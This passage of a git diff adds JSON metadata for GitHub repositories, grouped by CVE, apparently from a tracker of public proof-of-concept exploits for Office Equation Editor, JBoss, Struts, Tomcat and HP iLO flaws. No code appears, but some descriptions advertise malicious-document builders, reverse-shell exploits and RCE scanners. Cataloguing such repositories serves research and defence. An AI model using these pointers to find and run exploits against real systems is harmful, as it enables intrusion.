"herbiezimmerman\/CVE-2017-11882-Possible-Remcos-Malspam", + "owner": { + "login": "herbiezimmerman", + "id": 12056770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12056770?v=4", + "html_url": "https:\/\/github.com\/herbiezimmerman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/herbiezimmerman\/CVE-2017-11882-Possible-Remcos-Malspam", + "description": null, + "fork": false, + "created_at": "2018-04-23T03:07:25Z", + "updated_at": "2024-08-12T19:37:58Z", + "pushed_at": "2018-04-23T03:08:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 132171985, + "name": "CVE-2017-11882", + "full_name": "ChaitanyaHaritash\/CVE-2017-11882", + "owner": { + "login": "ChaitanyaHaritash", + "id": 16261173, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16261173?v=4", + "html_url": "https:\/\/github.com\/ChaitanyaHaritash", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChaitanyaHaritash\/CVE-2017-11882", + "description": "Empire Port of CVE-2017-11882", + "fork": false, + "created_at": "2018-05-04T17:50:57Z", + "updated_at": "2023-01-28T12:10:12Z", + "pushed_at": "2018-05-04T17:53:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 139015885, + "name": "https-github.com-Ridter-CVE-2017-11882-", + "full_name": "qy1202\/https-github.com-Ridter-CVE-2017-11882-", + "owner": { + "login": "qy1202", + "id": 40664300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40664300?v=4", + "html_url": "https:\/\/github.com\/qy1202", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qy1202\/https-github.com-Ridter-CVE-2017-11882-", + "description": null, + "fork": false, + "created_at": "2018-06-28T12:35:53Z", + "updated_at": "2018-06-28T12:35:53Z", + "pushed_at": "2018-06-28T12:35:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 154284917, + "name": "CVE-2017-11882", + "full_name": "j0lama\/CVE-2017-11882", + "owner": { + "login": "j0lama", + "id": 17393029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17393029?v=4", + "html_url": "https:\/\/github.com\/j0lama", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j0lama\/CVE-2017-11882", + "description": null, + "fork": false, + "created_at": "2018-10-23T07:44:39Z", + "updated_at": "2018-11-05T22:36:38Z", + "pushed_at": "2018-10-23T07:46:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 161162866, + "name": "CVE-2017-11882", + "full_name": "chanbin\/CVE-2017-11882", + "owner": { + "login": "chanbin", + "id": 24631331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24631331?v=4", + "html_url": "https:\/\/github.com\/chanbin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chanbin\/CVE-2017-11882", + "description": "Microsoft Equation 3.0\/Convert python2 to python3", + "fork": false, + "created_at": "2018-12-10T11:15:15Z", + "updated_at": "2018-12-10T13:19:33Z", + "pushed_at": "2018-12-10T11:18:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 202340795, + "name": "CVE-2017-11882", + "full_name": "littlebin404\/CVE-2017-11882", + "owner": { + "login": "littlebin404", + "id": 54022042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54022042?v=4", + "html_url": "https:\/\/github.com\/littlebin404", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/littlebin404\/CVE-2017-11882", + "description": "CVE-2017-11882(通杀Office 2003到2016)", + "fork": false, + "created_at": "2019-08-14T11:55:00Z", + "updated_at": "2024-08-12T19:51:58Z", + "pushed_at": "2020-12-22T07:23:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 232606684, + "name": "Overflow-Demo-CVE-2017-11882", + "full_name": "ekgg\/Overflow-Demo-CVE-2017-11882", + "owner": { + "login": "ekgg", + "id": 31654501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31654501?v=4", + "html_url": "https:\/\/github.com\/ekgg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ekgg\/Overflow-Demo-CVE-2017-11882", + "description": "Simple Overflow demo, like CVE-2017-11882 exp", + "fork": false, + "created_at": "2020-01-08T16:27:18Z", + "updated_at": "2020-12-24T10:48:53Z", + "pushed_at": "2020-01-09T10:38:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 311542568, + "name": "CVE-2017-11882", + "full_name": "HaoJame\/CVE-2017-11882", + "owner": { + "login": "HaoJame", + "id": 24583124, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24583124?v=4", + "html_url": "https:\/\/github.com\/HaoJame", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HaoJame\/CVE-2017-11882", + "description": null, + "fork": false, + "created_at": "2020-11-10T04:13:53Z", + "updated_at": "2020-11-10T04:18:08Z", + "pushed_at": "2020-11-10T04:18:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 318228897, + "name": "CVE-2017-11882", + "full_name": "ActorExpose\/CVE-2017-11882", + "owner": { + "login": "ActorExpose", + "id": 57215674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57215674?v=4", + "html_url": "https:\/\/github.com\/ActorExpose", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ActorExpose\/CVE-2017-11882", + "description": null, + "fork": false, + "created_at": "2020-12-03T15:00:27Z", + "updated_at": "2024-08-12T20:08:10Z", + "pushed_at": "2020-12-03T15:01:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 332744031, + "name": "SignHere", + "full_name": "Retr0-code\/SignHere", + "owner": { + "login": "Retr0-code", + "id": 60541996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60541996?v=4", + "html_url": "https:\/\/github.com\/Retr0-code", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Retr0-code\/SignHere", + "description": "SignHere is implementation of CVE-2017-11882. SignHere is builder of malicious rtf document and VBScript payloads.", + "fork": false, + "created_at": "2021-01-25T12:44:03Z", + "updated_at": "2023-02-12T18:04:41Z", + "pushed_at": "2021-01-26T16:29:27Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "build-tool", + "builder", + "cve", + "cve-2017-11882", + "equation", + "malicious", + "microsoft", + "office", + "python3", + "rtf", + "vulnerabilities" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 431719997, + "name": "CVE-2017-11882-exp", + "full_name": "lisinan988\/CVE-2017-11882-exp", + "owner": { + "login": "lisinan988", + "id": 87479262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87479262?v=4", + "html_url": "https:\/\/github.com\/lisinan988", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lisinan988\/CVE-2017-11882-exp", + "description": null, + "fork": false, + "created_at": "2021-11-25T05:03:46Z", + "updated_at": "2021-11-25T05:15:18Z", + "pushed_at": "2021-11-25T05:03:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 471248581, + "name": "CVE-2017-11882", + "full_name": "tzwlhack\/CVE-2017-11882", + "owner": { + "login": "tzwlhack", + "id": 86322859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86322859?v=4", + "html_url": "https:\/\/github.com\/tzwlhack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tzwlhack\/CVE-2017-11882", + "description": null, + "fork": false, + "created_at": "2022-03-18T05:38:39Z", + "updated_at": "2024-05-15T08:40:23Z", + "pushed_at": "2022-03-18T05:38:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 524888706, + "name": "CVE-2017-11882-reproduction", + "full_name": "Sunqiz\/CVE-2017-11882-reproduction", + "owner": { + "login": "Sunqiz", + "id": 59192636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2017-11882-reproduction", + "description": "CVE-2017-11882复现", + "fork": false, + "created_at": "2022-08-15T07:09:23Z", + "updated_at": "2022-09-21T01:42:57Z", + "pushed_at": "2022-09-20T02:17:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610075894, + "name": "Maldoc-Analysis", + "full_name": "Abdibimantara\/Maldoc-Analysis", + "owner": { + "login": "Abdibimantara", + "id": 43168046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43168046?v=4", + "html_url": "https:\/\/github.com\/Abdibimantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdibimantara\/Maldoc-Analysis", + "description": "Pada bulan maret 2023, terdapat sample baru yang terindentifikasi sebagai malware. Malware tersebut berasal dari file berekstensi.xls dan .doc dan dikenal dengan nama “Bank Slip.xls”. Aktivitas malware tersebut memiliki hubungan dengan kerentanan yang dikenal dengan id CVE-2017-11882 dan CVE-2018-0802. ", + "fork": false, + "created_at": "2023-03-06T03:10:20Z", + "updated_at": "2023-03-09T01:08:28Z", + "pushed_at": "2023-03-06T05:48:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 640845395, + "name": "DetectPacket-CVE-2017-11882", + "full_name": "n18dcat053-luuvannga\/DetectPacket-CVE-2017-11882", + "owner": { + "login": "n18dcat053-luuvannga", + "id": 82393611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82393611?v=4", + "html_url": "https:\/\/github.com\/n18dcat053-luuvannga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n18dcat053-luuvannga\/DetectPacket-CVE-2017-11882", + "description": null, + "fork": false, + "created_at": "2023-05-15T08:47:31Z", + "updated_at": "2023-05-15T08:51:41Z", + "pushed_at": "2023-05-15T08:51:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711183982, + "name": "cve-2017-11882", + "full_name": "nhuynhuy\/cve-2017-11882", + "owner": { + "login": "nhuynhuy", + "id": 57981894, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57981894?v=4", + "html_url": "https:\/\/github.com\/nhuynhuy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nhuynhuy\/cve-2017-11882", + "description": null, + "fork": false, + "created_at": "2023-10-28T13:15:45Z", + "updated_at": "2023-10-28T13:15:46Z", + "pushed_at": "2023-10-28T13:15:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827428106, + "name": "Dragonfish-s-Malware-Cyber-Analysis", + "full_name": "jadeapar\/Dragonfish-s-Malware-Cyber-Analysis", + "owner": { + "login": "jadeapar", + "id": 143646365, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143646365?v=4", + "html_url": "https:\/\/github.com\/jadeapar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jadeapar\/Dragonfish-s-Malware-Cyber-Analysis", + "description": "Examining the phases of an attack using “Dragonfish's Elise Malware”, specifically, exploring the exploitation of vulnerability CVE-2017-11882. ", + "fork": false, + "created_at": "2024-07-11T16:15:27Z", + "updated_at": "2024-07-11T16:17:25Z", + "pushed_at": "2024-07-11T16:17:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11907.json b/2017/CVE-2017-11907.json new file mode 100644 index 0000000000..46d1c308f0 --- /dev/null +++ b/2017/CVE-2017-11907.json @@ -0,0 +1,33 @@ +[ + { + "id": 133616005, + "name": "CVE-2017-11907", + "full_name": "AV1080p\/CVE-2017-11907", + "owner": { + "login": "AV1080p", + "id": 21303759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21303759?v=4", + "html_url": "https:\/\/github.com\/AV1080p", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AV1080p\/CVE-2017-11907", + "description": "Windows: heap overflow in jscript.dll in Array.sort", + "fork": false, + "created_at": "2018-05-16T05:42:39Z", + "updated_at": "2019-08-26T16:40:29Z", + "pushed_at": "2018-05-16T05:51:44Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12149.json b/2017/CVE-2017-12149.json new file mode 100644 index 0000000000..f80ac53915 --- /dev/null +++ b/2017/CVE-2017-12149.json @@ -0,0 +1,250 @@ +[ + { + "id": 111536144, + "name": "CVE-2017-12149", + "full_name": "sevck\/CVE-2017-12149", + "owner": { + "login": "sevck", + "id": 11308052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11308052?v=4", + "html_url": "https:\/\/github.com\/sevck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sevck\/CVE-2017-12149", + "description": "CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)", + "fork": false, + "created_at": "2017-11-21T10:48:24Z", + "updated_at": "2022-01-03T12:10:39Z", + "pushed_at": "2017-11-22T06:59:57Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 112277258, + "name": "jboss-_CVE-2017-12149", + "full_name": "yunxu1\/jboss-_CVE-2017-12149", + "owner": { + "login": "yunxu1", + "id": 9799921, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9799921?v=4", + "html_url": "https:\/\/github.com\/yunxu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yunxu1\/jboss-_CVE-2017-12149", + "description": "CVE-2017-12149 jboss反序列化 可回显", + "fork": false, + "created_at": "2017-11-28T02:52:47Z", + "updated_at": "2024-11-01T02:37:43Z", + "pushed_at": "2019-03-13T08:57:50Z", + "stargazers_count": 206, + "watchers_count": 206, + "has_discussions": false, + "forks_count": 58, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 58, + "watchers": 206, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 115089440, + "name": "CVE-2017-12149", + "full_name": "1337g\/CVE-2017-12149", + "owner": { + "login": "1337g", + "id": 32504404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32504404?v=4", + "html_url": "https:\/\/github.com\/1337g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337g\/CVE-2017-12149", + "description": "CVE-2017-12149 JBOSS RCE (TESTED) ", + "fork": false, + "created_at": "2017-12-22T07:30:29Z", + "updated_at": "2024-02-17T22:44:32Z", + "pushed_at": "2017-12-23T06:43:16Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 15, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 203873391, + "name": "CVE-2017-12149", + "full_name": "jreppiks\/CVE-2017-12149", + "owner": { + "login": "jreppiks", + "id": 31517228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31517228?v=4", + "html_url": "https:\/\/github.com\/jreppiks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jreppiks\/CVE-2017-12149", + "description": "Jboss Java Deserialization RCE (CVE-2017-12149)", + "fork": false, + "created_at": "2019-08-22T21:06:09Z", + "updated_at": "2023-06-07T11:03:36Z", + "pushed_at": "2019-08-22T21:08:14Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 372309025, + "name": "jboss-deserialization", + "full_name": "Xcatolin\/jboss-deserialization", + "owner": { + "login": "Xcatolin", + "id": 60984217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60984217?v=4", + "html_url": "https:\/\/github.com\/Xcatolin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Xcatolin\/jboss-deserialization", + "description": "JBoss CVE-2017-12149 (Insecure Deserialization - RCE) Exploitation Lab.", + "fork": false, + "created_at": "2021-05-30T20:26:51Z", + "updated_at": "2022-12-19T22:10:42Z", + "pushed_at": "2021-08-04T10:11:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481613956, + "name": "CVE-2017-12149", + "full_name": "VVeakee\/CVE-2017-12149", + "owner": { + "login": "VVeakee", + "id": 85714114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85714114?v=4", + "html_url": "https:\/\/github.com\/VVeakee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VVeakee\/CVE-2017-12149", + "description": null, + "fork": false, + "created_at": "2022-04-14T13:24:51Z", + "updated_at": "2022-04-14T13:27:12Z", + "pushed_at": "2022-04-16T09:09:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 675283910, + "name": "jboss-_CVE-2017-12149", + "full_name": "MrE-Fog\/jboss-_CVE-2017-12149", + "owner": { + "login": "MrE-Fog", + "id": 114317320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114317320?v=4", + "html_url": "https:\/\/github.com\/MrE-Fog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrE-Fog\/jboss-_CVE-2017-12149", + "description": null, + "fork": false, + "created_at": "2023-08-06T12:11:43Z", + "updated_at": "2023-08-06T12:12:01Z", + "pushed_at": "2023-08-06T12:12:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 794249748, + "name": "CVE-2017-12149", + "full_name": "JesseClarkND\/CVE-2017-12149", + "owner": { + "login": "JesseClarkND", + "id": 7518924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7518924?v=4", + "html_url": "https:\/\/github.com\/JesseClarkND", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JesseClarkND\/CVE-2017-12149", + "description": "Update of https:\/\/github.com\/1337g\/CVE-2017-12149 to work with python3", + "fork": false, + "created_at": "2024-04-30T18:40:48Z", + "updated_at": "2024-04-30T18:41:54Z", + "pushed_at": "2024-04-30T18:41:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1235.json b/2017/CVE-2017-1235.json new file mode 100644 index 0000000000..2d7624a539 --- /dev/null +++ b/2017/CVE-2017-1235.json @@ -0,0 +1,33 @@ +[ + { + "id": 885897135, + "name": "CVE-2017-1235_exploit", + "full_name": "11k4r\/CVE-2017-1235_exploit", + "owner": { + "login": "11k4r", + "id": 81901900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81901900?v=4", + "html_url": "https:\/\/github.com\/11k4r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/11k4r\/CVE-2017-1235_exploit", + "description": null, + "fork": false, + "created_at": "2024-11-09T17:19:17Z", + "updated_at": "2024-11-09T17:20:02Z", + "pushed_at": "2024-11-09T17:19:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12426.json b/2017/CVE-2017-12426.json new file mode 100644 index 0000000000..2cfa36b3aa --- /dev/null +++ b/2017/CVE-2017-12426.json @@ -0,0 +1,33 @@ +[ + { + "id": 100264267, + "name": "CVE-2017-12426", + "full_name": "sm-paul-schuette\/CVE-2017-12426", + "owner": { + "login": "sm-paul-schuette", + "id": 29304646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29304646?v=4", + "html_url": "https:\/\/github.com\/sm-paul-schuette", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sm-paul-schuette\/CVE-2017-12426", + "description": null, + "fork": false, + "created_at": "2017-08-14T12:18:15Z", + "updated_at": "2017-08-14T12:18:15Z", + "pushed_at": "2017-08-14T12:19:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12542.json b/2017/CVE-2017-12542.json new file mode 100644 index 0000000000..8f648e5b26 --- /dev/null +++ b/2017/CVE-2017-12542.json @@ -0,0 +1,64 @@ +[ + { + "id": 120347425, + "name": "CVE-2017-12542", + "full_name": "skelsec\/CVE-2017-12542", + "owner": { + "login": "skelsec", + "id": 19204702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19204702?v=4", + "html_url": "https:\/\/github.com\/skelsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skelsec\/CVE-2017-12542", + "description": "Test and exploit for CVE-2017-12542", + "fork": false, + "created_at": "2018-02-05T18:55:56Z", + "updated_at": "2024-11-12T18:06:09Z", + "pushed_at": "2018-04-15T12:01:38Z", + "stargazers_count": 85, + "watchers_count": 85, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 85, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 202627780, + "name": "ilo4-rce-vuln-scanner", + "full_name": "sk1dish\/ilo4-rce-vuln-scanner", + "owner": { + "login": "sk1dish", + "id": 46909212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46909212?v=4", + "html_url": "https:\/\/github.com\/sk1dish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sk1dish\/ilo4-rce-vuln-scanner", + "description": "Scan a list of given IP's for CVE-2017-12542", + "fork": false, + "created_at": "2019-08-16T00:03:29Z", + "updated_at": "2022-11-15T04:33:41Z", + "pushed_at": "2019-08-22T23:27:41Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12561.json b/2017/CVE-2017-12561.json new file mode 100644 index 0000000000..84251f3ecc --- /dev/null +++ b/2017/CVE-2017-12561.json @@ -0,0 +1,33 @@ +[ + { + "id": 546225774, + "name": "CVE-2017-12561", + "full_name": "Everdoh\/CVE-2017-12561", + "owner": { + "login": "Everdoh", + "id": 17012809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17012809?v=4", + "html_url": "https:\/\/github.com\/Everdoh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Everdoh\/CVE-2017-12561", + "description": null, + "fork": false, + "created_at": "2022-10-05T18:40:09Z", + "updated_at": "2022-10-05T18:40:09Z", + "pushed_at": "2022-10-05T18:45:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12611.json b/2017/CVE-2017-12611.json new file mode 100644 index 0000000000..ace099e632 --- /dev/null +++ b/2017/CVE-2017-12611.json @@ -0,0 +1,33 @@ +[ + { + "id": 102809812, + "name": "S2-053-CVE-2017-12611", + "full_name": "brianwrf\/S2-053-CVE-2017-12611", + "owner": { + "login": "brianwrf", + "id": 8141813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8141813?v=4", + "html_url": "https:\/\/github.com\/brianwrf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brianwrf\/S2-053-CVE-2017-12611", + "description": "A simple script for exploit RCE for Struts 2 S2-053(CVE-2017-12611)", + "fork": false, + "created_at": "2017-09-08T02:50:37Z", + "updated_at": "2024-08-12T19:32:28Z", + "pushed_at": "2017-09-08T11:59:20Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 36, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12615.json b/2017/CVE-2017-12615.json new file mode 100644 index 0000000000..75d5604ed3 --- /dev/null +++ b/2017/CVE-2017-12615.json @@ -0,0 +1,475 @@ +[ + { + "id": 104546028, + "name": "CVE-2017-12615", + "full_name": "breaktoprotect\/CVE-2017-12615", + "owner": { + "login": "breaktoprotect", + "id": 4725563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4725563?v=4", + "html_url": "https:\/\/github.com\/breaktoprotect", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/breaktoprotect\/CVE-2017-12615", + "description": "POC Exploit for Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP vulnerability.", + "fork": 